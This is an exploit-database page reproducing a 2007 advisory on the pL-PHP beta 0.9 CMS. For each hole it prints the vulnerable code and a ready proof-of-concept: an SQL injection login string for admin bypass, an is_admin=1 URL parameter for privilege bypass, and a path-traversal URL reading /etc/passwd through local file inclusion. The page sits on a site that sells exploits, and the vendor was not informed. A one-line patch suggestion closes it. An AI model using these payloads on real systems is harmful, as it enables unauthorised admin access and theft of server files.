0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
pL-PHP beta 0.9 Multiple Remote Vulnerabilities
[===============================================
pL-PHP beta 0.9 Multiple Remote Vulnerabilities
===============================================
. . .
._ | _. .|_ _. _.;_/
[_)|(_]\_|[ )(_](_.| \.net
| ._|
"pL-PHP beta 0.9 - MULTIPLE VULNERABILITIES"
by Omni
1) Infos
---------
Date : 2007-04-10
Product : pL-PHP
Version : beta 0.9 - Prior version maybe also be affected
Vendor Status : 2007-04-10 -> Not Informed!
Description : pL-PHP is a new PHP Portal or Content Management System (CMS). It is based on a "multi-topics" system,
with sub-topics, and all the content (downloads, articles, headers, links...) is shared into these topics
and sub-topics. It will be very easy to use.
Source : omnipresent - omni
Team : Playhack.net Security
2) Security Issues
-------------------
--- [ SQL Injection - Admin Access Bypass ] ---
===============================================
[login.php Source Code Bugged - Line 10 - 20]
require("includes/config.php");
// Authentification
// Script inspir? par DBprotect 1.0 de David Borrat (david@borrat.net)
if (isset($_POST['login'])) {
$login = $_POST['login'];
$pass = md5($_POST['pass']);
$sql = mysql_connect($global['sql_host'], $global['sql_user'], $global['sql_pass']);
mysql_select_db($global['sql_base'], $sql);
$verif_query = sprintf("SELECT * FROM " . $global['prefix'] . "_users WHERE username='$login' AND user_password='$pass'");
[end login.php Source Code]
As we can see the variables $login and $pass are not properly sanitized before being used; so is possibile to exploit this vulnerability remotely.
[ PoC ]
=======
Just run with your browser to login.php and insert in the login field: 1' OR '1' = '1' # and in the pass filed what you want! Now you have Admin credential!
--- [Global Variable problem - Admin Access Bypass ] ---
========================================================
[admin.php Source Code Bugged - Line 14]
[...]
if($is_admin == 1)
[...]
[end admin.php Source Code]
As we can se, via the browser we can just connect to admin.php script and pass the variable isadmin the number 1 :D.
[ PoC ]
=======
http://remote_host/[remote_path]/admin.php?is_admin=1
Now you are Admin ;)
--- [Local File Inclusion ] ---
===============================
[admin.php Source Code Bugged - Line 16]
[...]
include("admin/lang/" . $lang . ".inc.php");
[...]
[end admin.php Source Code]
As we can se, via the browser we can just connect to admin.php script and pass the variable $lang a pretty good path ;).
[ PoC ]
=======
Connect with Admin Credential and... Have fun..
eg 1:
http://127.0.0.1/files/admin.php?is_admin=1&lang=../../../../../../etc/passwd%00
eg 2:
First you must.. log in as Admin (SQL Injection Method) and then...
http://127.0.0.1/files/admin.php?&lang=../../../../../../etc/passwd%00
3) Patches
-----------
Edit the source code to ensure that the input will be properly sanitized before being used
# 0day.today [2024-11-15] #